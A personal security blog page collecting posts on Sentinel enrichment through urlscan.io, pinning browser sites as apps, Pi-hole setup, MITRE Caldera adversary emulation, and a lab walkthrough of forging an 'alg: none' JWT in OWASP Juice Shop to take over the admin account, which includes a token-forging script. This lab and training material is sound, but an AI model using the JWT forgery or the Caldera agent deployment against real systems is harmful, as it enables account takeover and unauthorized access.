Microsoft Sentinel – Incident Enrichment with urlscan.io

Getting a SOC analyst the data they need during an investigation is critical to driving down incident response time. Microsoft Sentinel provides a fantastic place to do incident investigation and response, and many of the solutions on the Content Hub or available via the community can pull in data from external sources to enrich alerts and incidents. Beyond those, there are powerful 3rd party services that can be woven into the response lifecycle to give the analyst contextual enrichment data.

This blog is going to walk through:

  • Signing up for urlscan.io
  • Working with Postman to understand the urlscan.io API
  • Utilizing the Postman Collection to create a custom Logic App Connector
  • Building out a logical flow for utilizing the API for incident enrichment
  • Building a Logic App to enrich a Sentinel Incident


What is urlscan.io?

Per the company’s website (located here: About – urlscan.io)

urlscan.io is a free service to scan and analyse websites. When a URL is submitted to urlscan.io, an automated process will browse to the URL like a regular user and record the activity that this page navigation creates. This includes the domains and IPs contacted, the resources (JavaScript, CSS, etc) requested from those domains, as well as additional information about the page itself. urlscan.io will take a screenshot of the page, record the DOM content, JavaScript global variables, cookies created by the page, and a myriad of other observations. If the site is targeting the users of one of the more than 400 brands tracked by urlscan.io, it will be highlighted as potentially malicious in the scan results.

urlscan.io provides 3 main APIs for free. There are commercial options that can be explored on the company’s website for higher quotas and additional functionality.

APIs (a minimal request sketch in Python follows the list):

    1. Search: searches urlscan.io to see if the submitted website has already been scanned and then returns those results
      1. Input: URL query string
        1. method: GET
        2. q=domain:whateverdomain.com (domain for which to search)
        3. size=number (number of results to return)
        4. search_after=number (batch retrieval – not used in this post)
      2. Response
        1. JSON response with an array of results (up to ‘size’) sorted most recent to oldest. Response includes URL to a site screenshot as well as a URL to the full JSON result for each result.
    2. Submission: submits a URL to be scanned by urlscan.io. Returns a UUID that can be used to retrieve those specific scan results
      1. Input: POST body
        1. url: url to scan
        2. visibility: defaults to the value in account settings if not specified
        3. tags: array of tags that can be passed (optional)
      2. Response
        1. JSON response with success/fail messages, information about the API, and most importantly the uuid field which can be used with the result API to retrieve the specific results of this scan
    3. Result: accepts the UUID from a previous submission and returns that scan’s specific results
      1. Input:
        1. use the uuid value from the Submission API within the URL path
      2. Response:
        1. The full result set including URLs, certificates, hosting, etc. Of highest interest, URLs to:
          1. Screenshot of the page
          2. Full result set
          3. Initial DOM code
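
To make the three calls concrete, here is a minimal Python sketch of the trio. The endpoint paths follow the urlscan.io docs; the API key, domain, and visibility values are placeholders to swap for your own:

    import requests

    HEADERS = {"API-Key": "<your-api-key>"}   # placeholder key

    # 1. Search: has this domain been scanned already?
    search = requests.get(
        "https://urlscan.io/api/v1/search/",
        params={"q": "domain:whateverdomain.com", "size": 1},
        headers=HEADERS,
    ).json()

    # 2. Submission: request a fresh scan; the response includes a uuid
    submit = requests.post(
        "https://urlscan.io/api/v1/scan/",
        json={"url": "https://whateverdomain.com", "visibility": "private"},
        headers=HEADERS,
    ).json()

    # 3. Result: retrieve the finished scan by uuid (404s until the scan completes)
    result = requests.get("https://urlscan.io/api/v1/result/" + submit["uuid"] + "/").json()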

Straightforward – now to sign up!

urlscan.io Account

Signing up is easy and free. Again, there are commercial options, so make sure to explore what makes sense for you and your organization. For demo purposes, I am sticking with the free tier.

[Screenshot: urlscan.io sign-up page]

Username & Password…done. Once signed up, you can look at your account and see your quotas:

[Screenshot: urlscan.io account quotas]

(Recommend enabling 2FA.) A noteworthy item here is the visibility of your scans. You can set the default for your scans to Public (everyone can see), Unlisted (only vetted security researchers w/ Pro licenses can see), or Private (visible only to you). Set this to your preference. More information here: API Documentation – urlscan.io

Now that you have an account, the next step is to generate and save off your API key:

[Screenshot: generating the urlscan.io API key]

Done! We’re now ready to play with the API.

Postman

When I start playing with an API, my tool of choice is Postman. Postman is available here: Download Postman | Get Started for Free

There are many benefits to using Postman, but a huge one for this scenario is that the Postman collection can be directly imported into Azure Logic Apps Custom Connectors to do a bunch of the heavy lifting for utilizing the API. I created a very simple collection with the 3 main API calls for urlscan.io.

Download here: sentinel/urlscan_io at main · scomurr/sentinel (github.com)

Import the collection into Postman and then set your API key. Set it at the top level so that it is inherited for each of the calls:

[Screenshot: setting the API key at the collection level in Postman]

Now that the API-Key header is set, let’s play with the calls.

Search:

[Screenshot: Search API call returning no results]

When a domain that doesn't exist is submitted to the Search API, notice that no results are returned. The same will be true if the site has never been scanned.

Here, I’m specifying a domain that does exist and has been scanned:

[Screenshot: Search API call with results]

Excellent! The API key is working and I have results. By specifying size=1, I am returning only the most recent scan. Logic can be wrapped around the timestamp to ensure the scan is fresh.
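
That timestamp logic is only a few lines; here is a Python sketch, assuming the task.time field on the first search result and reusing the search response from the earlier sketch:

    from datetime import datetime, timedelta, timezone

    latest = search["results"][0]
    scanned_at = datetime.fromisoformat(latest["task"]["time"].replace("Z", "+00:00"))
    is_fresh = datetime.now(timezone.utc) - scanned_at < timedelta(hours=24)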

Moving on to the Submission API, I am going to submit my test domain (jhgfdsa.com) to get a fresh scan.

[Screenshot: Submission API call in Postman]

Note the uuid. A key consideration here is that the scan will not be immediately available. It can take a few minutes depending on the complexity of the scan, how busy the urlscan.io services are, how busy the scanned site is, etc. This will have to be factored into the automation logic.

After waiting a few minutes, I can take the uuid value over to the Results API and get my scan results:

[Screenshot: Result API call in Postman]

Results! We now have a fully functional Postman collection that allows for easy access to the urlscan.io APIs.

Keep Postman open (if you’re following along) – we need the results from each of the API calls for configuring the response options in the next step.

Logic App Custom Connector

The next step is to bring the collection (either export your own, use the one I provided, or create a new one) into Azure and create a Logic Apps Custom Connector. This will allow each of the 3 API calls to be used within a Logic App in response to a Sentinel incident.

Log into Azure and navigate to “Logic Apps Custom Connector” and then click ‘Create’.

[Screenshot: creating the Logic Apps Custom Connector]

NOTE: the custom connector needs to be in the same region as your logic app. If it is not, the connector will not be available for use within your Logic App.

Now, review and create the custom connector. Once it is created, we can configure it by navigating to the resource and hitting Edit.

[Screenshot: editing the custom connector]

Now, hit the Import button, browse to the Postman collection JSON file, and then hit ‘Update connector’.

[Screenshot: importing the Postman collection]

NOTE: the name in the dialog box may not switch to match the name of the JSON file. This can be a little misleading, as you may think browsing to the file was not successful.

Once the collection is imported, hit 'Security' at the bottom of the screen to move to the next page. The urlscan.io API calls require that the API-Key header is included along with the API key itself, so configure the Security options as such:

[Screenshot: custom connector Security settings]

The parameter name needs to be exactly API-Key to match the API's requirements.

Now, at the bottom move on to ‘Definition’. If the import was successful, you will see the 3 API calls on the left:

[Screenshot: custom connector Definition page]

At this point, we need to configure the response options for each of our API calls. For each of the calls, move down the screen to the Response section and hit the default response:

[Screenshot: default response section]

Now, hit ‘Import from sample’. This will cause the option to import to fly out from the right.

[Screenshot: 'Import from sample' flyout]

Navigate back to Postman, and for the Submit API, copy the response from the previous call and paste it into the Body section of the flyout shown above. After pasting, hit Import.

[Screenshot: copying the response body from Postman]

After Import, you should see the elements from the body as payload responses:

[Screenshot: imported payload response elements]

Hit 'Update connector' up top. Once the update completes, repeat the same steps for the Search (possible error here – check the next note) and ScanResults actions on the left-hand side.

NOTE: for the Search result set, the "sort" element in the response JSON payload looks like this:

"sort": [
     1664215094152,
     "c4d660e5-e55e-456d-9d85-cbc3ea140767"
],

This causes an error because the Azure Portal UI sees the first element in the sort array as an integer and the second element as a string, and that mismatch throws the error. To move past this, simply wrap the integer in double quotes ("1664215094152") so both elements are treated as strings.
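
After the tweak, the pasted sample reads:

    "sort": [
         "1664215094152",
         "c4d660e5-e55e-456d-9d85-cbc3ea140767"
    ],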

One more tweak is needed to make the Postman collection work – the Result API. Go to Definition and open the Swagger Editor. Scroll down to '/api/v1/result' (around line 120). Two changes: first, set the path to '/api/v1/result/{uuid}:'. Second, add a parameter (around line 125/126) so that the swagger file looks like this:

[Screenshot: updated swagger definition]

The parameter is:

- {name: uuid, in: path, type: string, required: true}
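
In context, the tweaked section of the swagger file ends up looking roughly like this (a sketch – the operationId and surrounding response details will match whatever the import generated in your file):

    paths:
      /api/v1/result/{uuid}:
        get:
          operationId: ScanResults        # existing operation, unchanged
          parameters:
            - {name: uuid, in: path, type: string, required: true}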

This parameterizes the last element of the path for the Result API. Hit 'Update connector' and the custom connector is complete! Now, it's a matter of mapping out the logic for responding to a Microsoft Sentinel incident with URL entities.

Download the custom connector here: sentinel/urlscan_io at main · scomurr/sentinel (github.com)

Response Logic

Looking at the API best practices documented on urlscan.io's website, the goal is to avoid burning my quota by only calling the Submission and Result APIs when no search result is returned or the result is stale. For demo purposes, I am only looking to bring in the latest result as long as it is < 24 hours old. Here's a high-level diagram of the logic I want to attempt in the Logic App:

[Diagram: high-level enrichment logic flow]

The goal will be to manually trigger the playbook from a Sentinel incident; however, once the logic is baked and a comfort level is established, it could be flagged to run automatically and enrich incidents.

Logic App

In order to create the Logic App for incident response, I am going to navigate to Sentinel –> Automation

[Screenshot: Sentinel Automation blade]

This launches the 'Create playbook' screen:

[Screenshot: 'Create playbook' screen]

Move through to Review and Create. We now have a logic app with the Microsoft Sentinel incident trigger ready to go!

I am not going to walk through the creation and logic of the app in detail; however, the gist of it matches the flow diagram above (and the sketch after this list). Once manually triggered,

  1. The Search API will be called
    1. If there is a result, the age of the result will be checked
    2. If the age check passes, the result of the Search API will be used
  2. Otherwise,
    1. The Submission API will be called to start a fresh scan
    2. A loop w/ a 1-minute delay between iterations will be used
    3. Each iteration of the loop will call the Result API
    4. Once results are returned, they will be sent to the incident
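
Expressed as plain pseudologic, the playbook flow boils down to something like this. A Python sketch of the flow only – search_api, is_fresh, submit_api, result_api, and post_incident_comment are hypothetical stand-ins for the connector actions and Sentinel steps:

    import time

    def enrich(url: str) -> dict:
        hits = search_api(f"domain:{url}", size=1)    # 1. call the Search API
        if hits and is_fresh(hits[0]):                #    a result exists and passes the age check
            return hits[0]
        uuid = submit_api(url)                        # 2. otherwise submit a fresh scan
        for _ in range(4):                            #    loop a few times before giving up
            time.sleep(60)                            #    1-minute delay between iterations
            result = result_api(uuid)                 #    poll the Result API
            if result is not None:
                return result                         #    these get posted to the incident
        raise TimeoutError("scan results never became available")

    # post_incident_comment(incident, enrich("scomurr.com"))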

Note, inside the Logic App Designer, I am able to use the Actions from the Custom Connector:

[Screenshot: custom connector actions in the Logic App Designer]

Completed playbook:

[Screenshot: completed playbook]

There’s a lot of additional detail in the playbook that’s hard to capture in the screenshot. Download the sample playbook arm template here: sentinel/urlscan_io at main · scomurr/sentinel (github.com)

NOTE: the ARM template will have to be updated to match the subscription and resource group identifiers for the target environment.

NOTE: Timestamp logic was not included in this iteration of the logic app. I opted to omit it for the purposes of simplicity and demoing the capabilities of the Custom Connector and the urlscan.io APIs.

Logic App Permission on Log Analytics Workspace

One last step – granting the Logic App the ability to actually update comments within a Sentinel incident. The easiest way to grant sufficient permissions to the app is within the IAM blade for the Log Analytics workspace.

Error: Attempting to execute prior to granting appropriate permissions

"StatusCode": "Forbidden",
"ReasonPhrase": "Forbidden",
"Content": "{\"error\":{\"code\":\"AuthorizationFailed\",\"message\":\"The client '45f08354-bdb4-4dd7-8547-478cedb154b8' with object id '45f08354-bdb4-4dd7-8547-478cedb154b8' does not have authorization to perform action 'Microsoft.SecurityInsights/incidents/comments/write' over scope '/subscriptions/<subid>/resourceGroups/sentinel-rg/providers/Microsoft.OperationalInsights/workspaces/sentinel-laws/providers/Microsoft.SecurityInsights/incidents/78e6a70b-4884-4f81-bd4e-32bd02496db0/comments/c36bd762-9874-4609-b31c-3e2e17873c7c' or the scope is invalid. If access was recently granted, please refresh your credentials.\"}}",

To fix this, navigate to Log Analytics workspaces, select the Sentinel workspace in question, navigate to Access control (IAM), and then hit Add.

[Screenshot: workspace Access control (IAM)]

Hit 'Add role assignment', select "Contributor", and hit Next.

[Screenshot: selecting the Contributor role]

Managed identity –> Select members –> Logic app –> select the Logic App that requires the permissions:

[Screenshot: assigning the Logic App's managed identity]

Select and then Review + assign. Done!

Now, to test the enrichment via an incident within Sentinel.

Incident Enrichment

Within Sentinel, I have an incident that came over from Defender for Endpoint. Within the incident, there are several entities, but the one I am concerned with for the purposes of this blog post is the URL:

[Screenshot: URL entity on the incident]

Since I have a URL, I can call my enrichment playbook!

[Screenshot: running a playbook from the incident]

And then select the new playbook to run:

[Screenshot: selecting the playbook and hitting Run]

If all works out, the playbook will make calls to urlscan.io and update the incident with comments containing the screenshot and report URLs for the scan.

[Screenshot: playbook triggered]

Checking the incident after a few seconds and:

[Screenshot: incident comment with Search API results]

With functional URLs in the comment! Very exciting. This validates that the playbook works with a result that can be retrieved via the Search API. Now I need to test with a URL that has not been scanned. At the time of this writing, https://scomurr.com had not been scanned.

I generated an alert in Defender for Endpoint by looking for scomurr.com traffic, and the alert populated into Sentinel via the MDE integration. Launching the playbook…

[Screenshot: launching the playbook for scomurr.com]

Waiting just a bit, I checked the execution in Logic Apps:

[Screenshot: delay step in the Logic App run]

Which is perfect – the playbook is designed to wait 60 seconds after submitting the URL before calling the Result API to ensure the results are there. The playbook will run the loop four times before timing out and failing. After another 20 seconds, the comments with the results from the API were posted to Sentinel:

[Screenshot: incident comments with the submitted scan's results]

Done – I now have a Logic App Custom Connector and a Logic App for reaching out to urlscan.io and pulling in results from the API. The results can be posted directly to a comment within a Sentinel incident or alert in order to enrich the data available to an analyst. There is a myriad of great information available via these API calls and I am just using a few tiny elements.

Automation is power. Utilizing Logic Apps to enrich alerts and incidents within Sentinel can help an analyst respond even faster. Happy automating!

Uncategorized

Browser Tip: Pinning Sites as Applications

This is a trick I use pretty heavily to control the number of tabs I have open; it allows me to quickly navigate back to my critical sites without having to sift through the insane number of tabs I seem to always have/leave open.

[Screenshot: browser window with many open tabs]

For the sake of argument, let's say you are a heavy LinkedIn user. One of those little tabs in the screenshot there is LinkedIn, but it can be a pain to locate, ESPECIALLY if you have multiple browser stacks open. As I am writing this right now, I have Brave open with 7 tabs, Chrome open with 4 tabs, and 3 stacks of Edge open with 25 total tabs – it's usually much worse. It can be a challenge (and a work disruption) to try and locate the right content. Now, an obvious solution is tab hygiene – close what I am not using. I've come to the realization that this is just not going to happen for me. If you can pull it off – kudos. I like this trick instead, as it allows me to stay in flow when I am trying to get things done and not have to worry about managing my browser(s).

Here's an alternative that works with any Chromium-based browser (Edge, Chrome, Brave, etc.) regardless of OS. In a previous role, I was using G-Suite on a Mac; leveraging this approach, I was able to pin all of my Google apps to the dock and have them function as separate apps. The approach is truly platform agnostic.

I’m going to use Edge to pin LinkedIn (since I already have it open).

[Screenshot: Edge menu]

3 dots in the upper right corner –> Apps –> Install this site as an app.

[Screenshot: 'Install this site as an app' dialog]

You now have the option to change the icon if wanted and to rename the app. It is handy to clean up the name right now, as this process will name the app with the full title currently in the browser tab. In this case, I remove the "(11) Feed |" part.

Edge additionally gives these options:

[Screenshot: Edge post-install options]

I like the defaults so I hit allow and we’re there! I now have a LinkedIn app within my taskbar, pinned, and it is now super easy for me to navigate back.

[Screenshot: LinkedIn pinned to the taskbar]

What now appears to be an app with the LinkedIn icon is actually still running within the Edge browser. In fact, the 3 dots at the top of this new “app” allow for easy navigation back to the full browser window if wanted.

[Screenshot: the pinned app's menu]

It seems all Chromium based browsers have similar functionality.

Brave & Chrome:

[Screenshot: Brave and Chrome install options]

And then:

[Screenshot: install prompt]

Now, rather than sifting through the mess of tabs I have open across multiple browsers, I can simply navigate back to the site by using the pinned "app". In my case, I now have 2 of them since I've pinned using both Edge and Brave.

[Screenshot: pinned apps on the taskbar]

This works with just about any site, but I especially like using it if the site is a Progressive Web App. Often, the PWA can be more performant than the thick client for some apps.

Happy surfing!

Productivity

MITRE Caldera – Emulating an Adversary

Perishable threat intelligence – when a new attacker enters the fray or an existing threat actor changes their tactics, the various security firms will inevitably publish threat intel on these attacks. IOCs expire quickly and, in an instant, grow more stale than the box of cereal your kids raided and failed to reseal. This does not, however, mean that threat intel should be completely ignored. In fact, it provides value in a few different spaces.

In this blog post, I am going to focus on how to use threat intel with MITRE Caldera in order to mimic an adversary. You may want to do this for a few different purposes. The first might be a product evaluation: can endpoint security tool X protect, detect, and help you respond to these attacks? The second is training your SOC and responders: what does the telemetry look like? Do we have all the detections in place necessary to see the various components across the kill chain in these specific attacks? By leveraging threat intel in these ways, you can know whether you are able to handle these categories of attacks regardless of how attackers morph them. Since defenders are almost always 1+ steps behind, it is important to utilize threat intel to ensure you have the tooling and expertise you need across entire categories of the kill chain.

MITRE Caldera: https://github.com/mitre/caldera

Documentation: https://caldera.readthedocs.io/en/latest/

I HIGHLY recommend running through the content within the Training plugin once you have the product installed. It will give you a solid base of understanding of the product. If you complete the training, you even have the opportunity to turn in a flag to MITRE, and they will send you a certificate of completion.


Step 1: Installing the Red Agent

I am going to be using a Windows 10 machine. In order to really see what an adversary would be able to do on the endpoint, I am going to disable all of the Defender oriented protections on the VM including real-time protection as well as any of the mitigating controls that are contained with Attack Surface Reduction (ASR) such as Controlled Folder Access, Exploit Guard, Network Protection, etc. There is a whole host of capabilities built right into Windows 10 that stop most attackers dead in their tracks if the protections are enabled and configured correctly. Windows 10 really is a secure operating system if the full Defender stack is enabled.

Next, I am going to deploy the Sandcat agent (54ndc47) to the machine. Since I do not have a user to phish or anything like that, I just go ahead and deploy the agent by hand to get communication rolling. Caldera does a great job of giving you a PowerShell command customized to your environment if you just fill in the IP of your Caldera machine.

All I have to do is bring the command over to my victim machine, run it, and I will have the ability to attack. Notice, however, the last line of the PowerShell command will actually run the agent in a hidden window. I like to see what is going on so I am going to run the command a little differently so that I can see what is happening with the agent. There are different command line options that can give you verbose output.

As you can see here, I am running the agent in a way that displays verbose output. This will let me know when activities hit the agent which is nice for the purposes of demoing and troubleshooting.
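
For reference, a hand-run invocation looks something like this. This is a sketch – the binary name, server IP, and group should match what the Caldera UI generated for your environment, and -v is the verbose flag:

    .\sandcat.exe -server http://192.168.1.100:8888 -group red -v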

Above is the display of the new agent reporting into the red console within Caldera. Notice that I am running the agent as elevated. I would hope that any kind of phishing would land an attacker within a customer's environment in the user space and not directly as admin; however, basic mitigations such as removing local admin and deploying tooling such as LAPS are still unfortunately not the norm. If at all possible, implement as many of the mitigations from the Securing Privileged Access roadmap located here: https://aka.ms/sparoadmap. Basic account segmentation, credential hygiene, and the built-in security controls available on/within most modern operating systems are enough to stymie a significant portion of attackers, except for the most determined adversaries conducting a targeted attack. Now that we have an agent reporting into Caldera, let us look at constructing a basic adversary.

Step 2: Constructing an Adversary

Within the Caldera Red dashboard, Navigate -> Adversaries. Hit the slider so that it moves from VIEW to ADD.

Top center (it is kind of grayed out), find the spot that says "enter a profile name" and do so.

On the far right, we have the option to link an objective, add an adversary, and/or add an ability. For this demo, we are going to focus on MITRE tactics, techniques, and procedures (TTPs), so we are going to add an ability.

This brings up a new screen that allows us to browse to the TTPs we want to add to our adversary. The first dropdown list displays a list of the different tactics aligned to the MITRE framework.

I am going to go with discovery. Once I select discovery, techniques are populated in the next dropdown that once again align to the MITRE framework.

I am going to select T1082 – System Information Discovery. This lights up 12 associated abilities. These are basic endpoint enumeration capabilities that let you snag the version of the OS and other basic system information from the endpoint. I am going to add a few of these to my adversary. When I select one of these, I can view the code and the associated information for each of the supported platforms. This is really nice as it shows how these abilities are constructed, which can lend itself nicely to constructing your own custom TTPs down the road.

Down at the very bottom, hit Add to Adversary. Now, the new adversary looks like this:

I am going to add a few more for discovering additional system information. NOTE – since I am going after a Windows machine, I need to make sure whatever ability I select actually has Windows as an option, or I would need to potentially add my own code. For example, if I select List OS Information, I can look at the bottom and see that there is code for Darwin (Mac) and Linux – but there is no Windows! I can easily create a new ability and add an executor for this that runs the systeminfo command on the endpoint:

  • Reset button to clear all options
  • Generate new id (sets the GUID)
  • Name = Custom – List OS Information
  • Description = Identify System Info
  • Tactic = discovery
  • Technique ID= T1082
  • Technique = System Information Discovery
  • Add executor
  • Platform = Windows
  • Executor = psh
  • Command = systeminfo
  • Timeout = 60

Leave the rest. Save and then add it to our adversary.
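
For reference, abilities like this are stored on the Caldera server as YAML files; the one built above would look roughly like the following (field layout per the Caldera ability format; the GUID here is a hypothetical stand-in for whatever "Generate new id" produced):

    - id: 1b4fb81c-8090-426c-93ab-0a633e7a16a7   # hypothetical GUID
      name: Custom - List OS Information
      description: Identify System Info
      tactic: discovery
      technique:
        attack_id: T1082
        name: System Information Discovery
      platforms:
        windows:
          psh:
            command: systeminfo
            timeout: 60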

Notice that this activity actually now covers all 3 platforms

At this point, you can add as many techniques as align with your threat intel into your new custom adversary. I am not going to add any more for demo purposes; instead, I am going to go ahead and save my adversary.

Now, I can run an operation against my agent that I had previously deployed. Let us see if I get results!

Step 3: Run an Operation

Navigate -> Operations. Change the view to Add.

  • Name = Custom Adversary Test Operation
  • Group = red (in my environment there is only 1 group and the agent is assigned to this group)
  • Adversary = Blog Post Demo Adversary

Leave the rest and hit start. This should attack my agent with basic recon TTPs. After I hit start, I have to wait for the agent to beacon, but then I see the agent starting to run the activities I have associated with the operation.

Troubleshooting – if your activities do not run (or they just are not displayed), you can download the report, and it will potentially tell you which TTPs were not executed and even potentially why. For example, on the first pass with this blog post I set the executor for the custom activity to cmd and it failed to load and run. I did not dig into the details (I suspect it required the cmd-line param format for the executor), but I switched it to psh and now it runs just fine.

And I can view the details by clicking the star icon to the right

Cool stuff! With this, I can take perishable threat intel and use the Caldera tool to simulate the types of activities these actors are executing in the wild. This approach lets me test my tooling to ensure I have visibility, and potentially protection and control, in these spaces within my environment. I can train my SOC to look for these TTPs and the activities associated with various threat actors and campaigns. This can be very powerful if used in the right way.

MITRE, OffSec, Security

Pi-hole – Life Changer? Maybe…

The Internet seems to run on advertising – and that is fair. Companies and individuals need to find a way to monetize their products and data without hiding everything behind paywalls. With that being said, there are plenty of sites and services with ill intent when it comes to harvesting data, counting clicks, analyzing and attributing browsing habits, etc. As a consumer, a daily user of the Internet, and one who actually relies on the Internet for my livelihood, I feel it is very important to protect myself and my family’s online activities.

Enter Pi-hole

https://pi-hole.net/

What is Pi-hole? It is an application that runs on Linux (which could be running on a Raspberry Pi) that acts as a DNS sinkhole. When traffic from your network is looking to route to an unwanted domain on the Interwebs, Pi-hole simply refuses to respond with the IP address of the destination. This is a pretty slick way to head off adware and other dynamic content that gets rendered in a lot of sites. For me, I absolutely despise when I browse to a site, start reading, and then the whole page rearranges/shifts because an ad pops.

I was surprised at how easy this was to set up. First, a key point: Pi-hole does NOT require that you purchase a(nother) Raspberry Pi – it can run in a few different ways. It can run as a Docker container (awesome), or you can simply install it on one of the various operating systems that are supported. I have a beefy (if old) Hyper-V server running in my basement, so, for my purposes, I chose Ubuntu 18.04 – mostly because I already have a VM image created. I fired up a new copy of the image, ran sudo apt update && sudo apt upgrade, and away we go.

Install

https://github.com/pi-hole/pi-hole/#one-step-automated-install

I read through the install docs and chose the One-Step Automated Install. It is a VM – if something goes wrong, I can revert to a new image since nothing else is happening on this machine anyway. The one-step install went almost perfectly. It was fast, and I only hit one minor snag post-install: DNS resolution on the machine was pointed at 127.0.0.53 (the local stub resolver) in the /etc/resolv.conf file. I changed the file so that DNS is now resolved via my router (forwarded to the ISP).
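
The change amounts to a single line (a sketch – 192.168.1.1 stands in for whatever your router's address actually is):

    # /etc/resolv.conf – replace the 127.0.0.53 stub with the router
    nameserver 192.168.1.1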

The next step was to set the Pi-hole admin password. From my reading, it sounds like I might have missed a password being set and displayed on the screen during the install. No biggie – the password can be set by a machine admin:
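From a shell on the Pi-hole machine (the -a -p switch prompts for a new web admin password):

    sudo pihole -a -p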

The last step to configure Pi-hole was to update Gravity. I am not 100% sure this is a required step to get the Pi-hole working initially; however, things started working almost instantly (and awesomely) after I ran the update. Basically, Gravity takes all your block lists, consolidates them, and the result is the list that is used to sink unwanted requests:
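The update itself is a one-liner:

    pihole -g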

The only thing left to do at this point is to change the DNS settings in my environment so that my machines all start using the Pi-hole for DNS. For me, this actually meant temporarily cutting over to the built-in DHCP server that the Pi-hole provides for the purposes of this blog post.

Note – disable any other DHCP services running on the network.

24 hours later

Wow, what a difference.

Sites that are riddled with ads and out-of-control JS that make me want to hulk-smash the keyboard because the content moves after I have started reading…are no longer misbehaving. Games on my cell phone…playable! What a massive improvement in the user experience. And I now have the ability to pull in additional block lists or purposefully block sites and services in my environment by simply adding them to the list. I already love it, and this is going to be a very handy tool to have for testing purposes.

Automation, Security, Web Attacks

Practicing JWT Attacks Against Juice-Shop

I love attending the sessions put on by Black Hills Information Security when I can. Last week, the session was on JWT token attacks which I found very interesting. I wanted to see if I could mimic part of the demonstrated attack, reproduce and then leverage that attack into elevated access on a site. The BHIS session for JWT attacks on the day of 6/18/2020 can be found here: https://www.youtube.com/watch?v=muYmiEtPL8U&t=2490s

For this lab, I downloaded Juice Shop, which is intentionally vulnerable to many of the top OWASP attacks. Once I had the app up and running, I explored it some to enumerate users. In the session we didn't get to see where the admin user was exposed – turns out this was super easy to find. After poking around in the site, I decided to attack a password change for the admin account to see if I could muster a complete account takeover.

Step 1: Install Juice-Shop

I already had an Ubuntu 18.04 LTS machine running in the lab, so I just wanted to add the app here. I tried the NodeJS and NPM route first, but I ran into some snags and I did not want to invest a ton of time troubleshooting. I decided to go the Docker route and I was able to get this working on the first try.

Juice-Shop: https://github.com/bkimminich/juice-shop#docker-container

Docker installation directions: https://docs.docker.com/engine/install/ubuntu/

I followed the documented steps verbatim:

And I was able to browse the site:

 

Step 2: Recon

There is a ton to explore on this site. For the purposes of this post, the only necessary recon is to open the Apple Juice product, look at the product review and note the username of the person that left the review:


admin@juice-sh.op seems like a “juicy” target (pun intended).

Ok, now onto trying to exploit a JWT token vulnerability…

Step 3: Identify Where/What to Attack

    1. I need an account. If I have an account, I can look at how the JWT tokens are constructed, and then I can use that to try and craft a new token as my victim user. I went to Login and created a new account named hack@hack.com w/ a password of P@ssw0rd!

    2. I then logged in with the newly created credentials:

    3. I took a look at all of the traffic in the Burp proxy log and noticed calls to the /rest/user/whoami endpoint with my JWT token:

    4. The tokens are the same in the Authorization header as well as in the cookie. I chose the bottom /rest/user/whoami GET and sent it to Repeater
    5. Now I need to learn if I need to attack the Authorization Bearer token, the token in the cookie or both
      1. I added a letter to the auth header (basically breaking it) – no change on send
      2. I added a letter to the cookie and it breaks – this is the one that matters

Before:

After:

Step 4: Craft the JWT Attack Token

  1. This is a signed JWT token – I can tell because it's <base64URLencoded-header>.<base64URLencoded-payload>.<base64URLencoded-signature> – 3 base64urlencoded strings separated by periods:

  2. I copied the header into Decoder, decoded it as Base64, changed "RS256" to "None", and then encoded it as base64. The new string is my new header. I pasted this into a document off to the side for later use

     

    ** NOTE – the "=" sign will break the header. These need to be dropped when copying and pasting!

  3. Next, I grabbed the payload and dropped that into Decoder, modified the email address and then reencoded as base64:

    I changed the email address to admin@juice-sh.op and then encoded the payload as base64

  4. I copied the new payload and then pasted the new header and payload into Repeater. I dropped the signature (since we now have "None" in the header) and hit send:

    No luck – this is where I had to play with the headers a bit to get this to work consistently. In order to get the return I wanted, I ended up removing headers until I got the result.

    Modified request (missing some headers – most notably the bearer token):

    Result:

Success! With that, I doubted that the id of the admin user is 18 (this is the id for the hack@hack.com account I created). Most likely, admin is going to have an id of 1, so I changed that in the token, encoded, and resent. Result:

Step 5: JWT Attack

  1. I now have a JWT token that is accepted by the /rest/user/whoami API. With that, I need to see if other parts of the application will accept the token, and I chose to attack the password change functionality. I went into password reset on my account to change the password:

    And changed the password to "password1":

  2. Looking at this traffic in Burp:

  3. I simply replaced the Authorization token with the newly crafted JWT, and replaced the entire cookie, in this new request from the previous Repeater request:

    I get a 200 back and the password is shown there within the returned payload. Turns out this is the MD5 of the password I did in fact just set. Now, can I login with the creds?

  4. Success!

I was able to change the password for the admin@juice-sh.op account and log into the app with the new credentials!

Key takeaways (both show up in the sketch below):

  1. Base64url encoding for the headers
    1. Drop the trailing “=” or the header will break
  2. Play with the headers until you get a result you like
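
For reference, the token-crafting step boils down to a few lines of Python. This is a minimal sketch – the claim names/values here are illustrative (Juice Shop's real payload carries a fuller user object), and I use the JWT spec's lowercase "none"; match whatever your target accepts:

    import base64, json

    def b64url(data: dict) -> str:
        # base64url-encode JSON and strip the trailing '=' padding --
        # leaving the padding in is what breaks the header
        raw = json.dumps(data, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).decode().rstrip("=")

    header = {"typ": "JWT", "alg": "none"}                        # signature no longer required
    payload = {"data": {"id": 1, "email": "admin@juice-sh.op"}}   # illustrative claims
    token = b64url(header) + "." + b64url(payload) + "."          # note the empty signature segment
    print(token)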

Good stuff!

Security, Web Attacks